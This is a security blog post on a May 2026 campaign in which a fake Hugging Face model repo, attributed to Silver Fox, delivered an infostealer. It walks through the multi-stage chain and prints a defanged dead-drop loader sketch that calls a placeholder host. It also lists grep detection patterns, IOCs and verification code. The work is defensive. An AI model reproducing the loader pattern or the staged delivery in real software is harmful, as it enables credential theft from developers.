In early May 2026, a malicious repository named Open-OSS/privacy-filter appeared on Hugging Face. It impersonated OpenAI's legitimate org and copied the official model card verbatim. Within 18 hours it was the #1 trending model on the platform with roughly 244,000 downloads. Behind the scenes, its loader.py was pulling a Rust-based information stealer onto every Windows machine that loaded the model.
The attack was discovered by HiddenLayer Research, which linked it to the WinOS 4.0 implant via prior Panther research on a parallel npm typosquat. Subsequent coverage from The Hacker News attributed the activity to Silver Fox, a Chinese threat actor associated with the ValleyRAT malware family. This guide covers what happened, how the multi-stage payload worked, and the seven verification steps every AI developer should run before calling from_pretrained on anything new.
Information current as of May 11, 2026. HiddenLayer Research, npm and Hugging Face security teams, and downstream reporters are still investigating. This post will be updated periodically as new IOCs, technical analysis, or attribution evidence is published.
What Happened
OpenAI published a small open-source utility model called openai/privacy-filter in April 2026. It is the kind of release that gets a few thousand downloads from researchers and red-teamers and then quietly accumulates a slow tail of traffic. Attackers noticed the same thing the rest of us did, which is that anything with “OpenAI” in the name pulls disproportionate attention on Hugging Face.
A few weeks later they uploaded Open-OSS/privacy-filter from a brand-new account. The repo cloned OpenAI's model card verbatim. The only differences were a malicious loader.py and a configuration that invoked it on load. According to BleepingComputer's coverage of the HiddenLayer findings, the model reached the top of Hugging Face's trending list inside 18 hours with around 244,000 downloads and 667 likes. Both numbers were likely inflated by bots, but the trending placement made the repo visible to legitimate developers searching for the real release.
The campaign was not a single repo. HiddenLayer documented a cluster of six sibling uploads from an account named anthfu (all uploaded April 24, 2026) that targeted other high-attention namespaces: Bonsai-8B-gguf, DeepSeek-V4-Pro, Qwopus-GLM-18B-Merged-GGUF, and others. All used the same loader pattern. A related npm package called trevlo, first flagged by Panther in April 2026, delivered the same WinOS 4.0 implant through the operator's parallel npm infrastructure.
Hugging Face disabled the repos shortly after disclosure. The npm package is gone. But for every researcher and developer who loaded the fake model during the 18-hour window, the stealer ran with their user privileges and shipped browser sessions, Discord tokens, wallet seed phrases, and FileZilla credentials out the door before anyone knew anything was wrong.
Incident Timeline
- Apr 2026: OpenAI publishes the legitimate openai/privacy-filter model on Hugging Face
- Early May 2026: Attackers create Open-OSS/privacy-filter, copying OpenAI's model card verbatim
- ~18 hours later: The fake repo hits #1 trending on Hugging Face with ~244,000 downloads and 667 likes
- May 7, 2026: HiddenLayer Research identifies the malicious loader.py and infostealer payload
- Shortly after disclosure: Hugging Face disables Open-OSS/privacy-filter and the related anthfu/* sibling repos
Anatomy of the Attack
The fake model worked because Hugging Face is, by design, a code-distribution platform that happens to host tensors. Any repo can ship a loader.py that runs the moment someone calls from_pretrained with trust_remote_code enabled. The five-stage chain that follows is reconstructed from HiddenLayer's technical writeup, and it is the same shape as a typical npm post-install attack, just adapted to the ML toolchain.
Stage 1: loader.py bait
Shipped inside the model repo. When a user calls from_pretrained on the fake model with trust_remote_code enabled, loader.py executes and disables SSL verification before fetching the next stage.
Stage 2: Dead-drop resolver
The loader queries JSON Keeper as a resolver to fetch the live payload URL, letting the operators swap delivery infrastructure without redeploying the model.
Stage 3: PowerShell + batch
A PowerShell command pulls a batch script from api.eth-fastscan[.]org. The script triggers a UAC prompt and adds Microsoft Defender exclusions for its working directory.
Stage 4: Rust infostealer
A 1.07 MB Rust-based stealer (SHA-256 ba67720d...) harvests Chromium and Gecko browser data, Discord local storage, FileZilla configs, crypto wallets, seed phrases, and screenshots.
Stage 5: Exfiltration
Harvested data is serialized to JSON and exfiltrated to recargapopular[.]com. Telemetry beacons go to welovechinatown[.]info as the C2.
Why the multi-stage design matters
The loader inside the repo is small, boring, and easy to miss in code review. The interesting payload lives at api.eth-fastscan[.]org, behind a JSON Keeper redirect that the operators can swap at will. Even if Hugging Face had scanned the static repo contents, the malicious bits were never in the artefact. They were one HTTP request away.
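To make the shape concrete, here is a heavily defanged sketch of the stage-1/stage-2 pattern. Every URL and name below is a placeholder, not the campaign's actual code; the point is how small and boring the in-repo half of the attack is.

# DEFANGED ILLUSTRATION -- placeholder URLs only; nothing here is the real payload.
# The in-repo half of a dead-drop loader: tiny, quiet, easy to skim past in review.
import json
import urllib.request

DEAD_DROP = "https://paste.example.com/b/XXXXX"  # hypothetical resolver URL

def fetch_next_stage() -> None:
    # Stage 2: ask the dead drop where today's payload lives. Operators can
    # rotate the real URL without ever touching the model repo.
    try:
        # Red flag: an outbound network call during model load.
        with urllib.request.urlopen(DEAD_DROP, timeout=5) as resp:
            payload_url = json.load(resp)["url"]
    except OSError as exc:
        print(f"[defanged] dead drop unreachable: {exc}")
        return
    # Stage 3 onward would fetch payload_url with SSL verification disabled
    # and exec() the response -- exactly what the greps in verification
    # step 3 below are designed to surface.
    print(f"[defanged] would fetch and execute: {payload_url}")

fetch_next_stage()  # red flag: side effects at import time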
Why the AI Model Supply Chain Is Different from npm
If you have read our coverage of the Axios npm supply chain attack or the Claude Code source map leak, the loader.py pattern looks familiar. It is essentially the npm post-install hook reinvented for the ML world. What makes the AI model supply chain a richer target is not the technique. It is the missing scaffolding.
npm has lockfiles, signed registry tarballs, npm audit, Socket.dev, Snyk, and a decade of muscle memory around .npmrc hardening. Hugging Face has tags, model cards, and a community trust signal in the form of likes and downloads. There is no widely adopted lockfile equivalent for model weights. There is no industry-standard signing mechanism for tensor files. The cultural default is trust_remote_code=True because some legitimate models genuinely need it.
That gap is where Silver Fox lived. Trending placement substituted for reputation. A copy-pasted model card substituted for code review. The 244,000 download number, inflated or not, substituted for a signed manifest. None of this is Hugging Face's fault any more than the Axios incident was npm's fault. It is the ecosystem maturing under attack.
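Nothing stops a team from approximating that lockfile today, though. Here is a minimal sketch that records a repo's commit SHA and per-file hashes so CI can fail loudly when anything moves upstream. It assumes a recent huggingface_hub where model_info(..., files_metadata=True) exposes per-file LFS hashes; treat the exact field names as version-dependent.

# Minimal "model lockfile" sketch: pin the commit SHA and per-file hashes
# for a repo so CI can detect upstream changes before anyone loads them.
import json
from huggingface_hub import model_info

def lock_model(repo_id: str, lockfile: str = "model.lock.json") -> None:
    info = model_info(repo_id, files_metadata=True)
    entry = {
        "repo_id": repo_id,
        "commit": info.sha,  # pass this as revision= when loading
        "files": {
            s.rfilename: (s.lfs.sha256 if s.lfs else s.blob_id)
            for s in info.siblings
        },
    }
    with open(lockfile, "w") as f:
        json.dump(entry, f, indent=2, sort_keys=True)

lock_model("openai/privacy-filter")  # commit the lockfile alongside requirements.txt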
How to Verify AI Models Before You Load Them
None of the following checks is sufficient on its own, but any one of them would have caught the fake privacy filter in under 60 seconds. If you maintain an MLOps pipeline that pulls models from Hugging Face, codify these as CI steps instead of relying on the person running from_pretrained to remember them.
1. Verify the org name against the vendor's official channel
The single most effective check. Open the vendor's official site (openai.com, ai.meta.com, mistral.ai) and copy the org slug from there. Do not trust a Hugging Face search result, do not trust the first Google hit, and do not trust a tweet. Typosquats like Open-OSS vs openai look obvious in hindsight and invisible when you are in flow.
# Always confirm the publisher org against the vendor's official channel.
# OpenAI's real repo is openai/. Look-alikes use Open-OSS/, openai-team/, etc.
#
# Wrong: Open-OSS/privacy-filter   <- typosquat
# Right: openai/privacy-filter     <- the real one
#
# Anchor on the announcement URL, not on a Hugging Face search result.
#   https://openai.com/index/<announcement-slug>
#   https://github.com/openai/<repo>
2. Check the upload date against the announcement
Real vendor releases ship on the same day as the announcement, not weeks later. A model card that quotes a blog post from a month ago but was uploaded yesterday is a red flag. Sort the org's repos by date and confirm the new release is not a recent solo upload from a fresh account.
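A quick programmatic version of steps 1 and 2, assuming a recent huggingface_hub release where ModelInfo exposes author and created_at:

# Sanity-check the publisher org and creation date before anything hits disk.
from huggingface_hub import model_info

def sanity_check(repo_id: str, expected_org: str) -> None:
    org = repo_id.split("/")[0]
    if org != expected_org:
        raise ValueError(f"publisher is {org!r}, expected {expected_org!r}")
    info = model_info(repo_id)
    # A repo created yesterday that quotes a month-old announcement is a red flag.
    print(f"{repo_id}: author={info.author}, created_at={info.created_at}")

sanity_check("Open-OSS/privacy-filter", expected_org="openai")  # raises: typosquat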
3. Audit any custom loader, config, or modeling file
Tensor files are inert. Python files are not. Open every loader.py, modeling_*.py, and configuration_*.py in the repo before you load anything. Five greps cover most of what an attacker would do.
# Before loading, eyeball every Python file shipped with the repo.
# These are the red-flag patterns.

# 1. Outbound network calls during load
grep -RInE "requests\.(get|post)|urllib\.|httpx\.|aiohttp\." .

# 2. Process execution
grep -RInE "subprocess|os\.system|os\.popen|pty\.spawn" .

# 3. Dynamic code execution
grep -RInE "exec\(|eval\(|compile\(" .

# 4. SSL verification disabled (the fake privacy filter did this)
grep -RInE "verify=False|InsecureRequestWarning" .

# 5. Pickle deserialization on attacker-controlled bytes
grep -RInE "pickle\.loads?|torch\.load.*weights_only=False" .
4. Default trust_remote_code to False
This flag is the single biggest force multiplier on a Hugging Face supply chain attack. With it set to True, calling from_pretrained on a malicious repo runs arbitrary code with your user permissions. Treat it the way you treat eval: never on by default, never on without a code review, never on without isolation. The official Hugging Face docs on custom models explain why the flag exists (loading architectures not built into transformers) and recommend pinning a revision whenever you do enable it.
5. Pin a commit SHA with revision=
Branch names like main move. The bytes you reviewed today are not guaranteed to be the bytes you load next week. Pin the exact SHA you audited via the revision parameter. This is the Hugging Face equivalent of a lockfile entry.
from transformers import AutoModel

# DANGEROUS: loads HEAD of main, which can change underneath you
model = AutoModel.from_pretrained(
    "vendor/model-name",
    trust_remote_code=False,  # default this to False
)

# SAFER: pin a specific commit SHA you audited
model = AutoModel.from_pretrained(
    "vendor/model-name",
    revision="3f9c2a1b4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f90",  # the SHA you reviewed
    trust_remote_code=False,
)
6. Run the first load inside a network-isolated sandbox
Even after the static review, run the first from_pretrained inside a container with --network none. If the loader tries to call out, you see the error instead of a stealer. If the load succeeds without complaint, the repo is at least not phoning home on import.
# Bake the Python deps into an image first (the only step that needs network),
# then run the actual model load with no outbound network at all.
docker build -t model-audit - <<'EOF'
FROM python:3.12-slim
RUN pip install --no-cache-dir transformers torch
EOF

# If anything tries to phone home during the load, you'll see it (and survive it).
docker run --rm -it \
  --network none \
  --read-only \
  --tmpfs /tmp:rw,size=2g \
  -e HF_HOME=/tmp/hf \
  -v "$PWD/audit:/audit:ro" \
  model-audit \
  python -c 'from transformers import AutoModel; AutoModel.from_pretrained("/audit/model", trust_remote_code=False)'
7. Subscribe to advisories that actually cover the AI stack
The traditional npm advisory feeds do not catch Hugging Face campaigns. Follow HiddenLayer Research, Socket.dev, and Hugging Face's own security disclosures. Set a 30-minute weekly slot to skim these in the same way ops teams skim CVE feeds. The fake privacy filter was disclosed publicly more than 24 hours before most teams found out internally.
The core principle: treat models as code
A Hugging Face repo is not a tensor file you download. It is a Python package that happens to ship weights. The same hygiene you apply to npm install on an unfamiliar package, you owe to from_pretrained on an unfamiliar model.
Attribution: Silver Fox and ValleyRAT
HiddenLayer's research connects the fake-model campaign to the WinOS 4.0 implant (also tracked as ValleyRAT) by linking its C2 domain welovechinatown[.]info to a parallel npm typosquat campaign documented by Panther in April 2026. Subsequent reporting from The Hacker News attributed the broader activity to Silver Fox, a Chinese-language threat actor best known for distributing WinOS 4.0 through phishing lures and trojanised installers aimed at Mandarin-speaking users.
Two things make this campaign notable as an evolution of the actor's tradecraft. First, the targeting shifted from regional phishing to the global developer audience that browses Hugging Face. Second, the operators ran a parallel npm push: a package called trevlo that delivered the same implant. Panther observed 866 downloads in their April 6 snapshot; CSO Online later reported the count had grown to roughly 2,300. HiddenLayer connects the two campaigns through the shared C2 domain welovechinatown[.]info.
The pattern matters because it confirms what defenders have suspected for a year: AI model registries and language package registries are now part of the same threat surface. The same operators are running both plays. The same defensive muscle you have built for one ecosystem applies to the other.
Indicators of Compromise
Source: HiddenLayer Research. Add these to your DNS sinkhole, EDR blocklists, and pip/Hugging Face audit rules.
Malicious repos (now disabled)
- Open-OSS/privacy-filter
- anthfu/Bonsai-8B-gguf
- anthfu/Qwen3.6-35B-A3B-APEX-GGUF
- anthfu/DeepSeek-V4-Pro
- anthfu/Qwopus-GLM-18B-Merged-GGUF
- anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
- anthfu/supergemma4-26b-uncensored-gguf-v2
- npm: trevlo
Network IOCs
- api.eth-fastscan[.]org
- welovechinatown[.]info
- recargapopular[.]com
- jsonkeeper[.]com/b/AVNNE
SHA-256 file hashes
- loader.py (Open-OSS/privacy-filter): 6db01158b044f178c45754666e2cbc0365f394e953fbf99ec34aa5304d5b79b1
- loader.py (anthfu/* repos): 6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c
- start.bat: 4fba92a34fd9338293de53444bc9f05c278897d903a24efb95fde0522b3d50c0
- update.bat (downloader): 04f0569971ac7ff81c8656e8453a69189d8870040044909dad45c04c567e7564
- Rust infostealer (1.07 MB): ba67720dd115293ec5a12d08be6b0ee982227a4c5e4662fb89269c76556df6e0
- Payload hosted by api.eth-fastscan[.]org: c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7
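To sweep a local Hugging Face cache for these hashes, something like the sketch below works. The cache path is the library default; adjust it if you set HF_HOME.

# Sweep a directory tree for files whose SHA-256 matches a known-bad IOC hash.
import hashlib
from pathlib import Path

IOC_HASHES = {
    "6db01158b044f178c45754666e2cbc0365f394e953fbf99ec34aa5304d5b79b1",  # loader.py (Open-OSS)
    "6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c",  # loader.py (anthfu/*)
    "4fba92a34fd9338293de53444bc9f05c278897d903a24efb95fde0522b3d50c0",  # start.bat
    "04f0569971ac7ff81c8656e8453a69189d8870040044909dad45c04c567e7564",  # update.bat
    "ba67720dd115293ec5a12d08be6b0ee982227a4c5e4662fb89269c76556df6e0",  # Rust infostealer
    "c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7",  # hosted payload
}

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):  # 1 MiB chunks
            h.update(chunk)
    return h.hexdigest()

for path in (Path.home() / ".cache" / "huggingface").rglob("*"):
    if path.is_file() and sha256_of(path) in IOC_HASHES:
        print(f"MATCH: {path}")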
Related Resources
The Claude Code Source Map Leak
512K lines of TypeScript shipped via npm, and the four-layer build config that would have prevented it.
The Axios npm Supply Chain Attack
100M weekly downloads compromised overnight. The .npmrc config and lockfile discipline that protect you.
Cursor vs Claude Code vs OpenCode
A backend engineer compares all three AI coding tools daily. Pricing, workflows, and when to use which.
Best Claude Code Plugins, Skills & MCP Servers
The 7 tools that power agentic development workflows, with a security lens on what they can access.
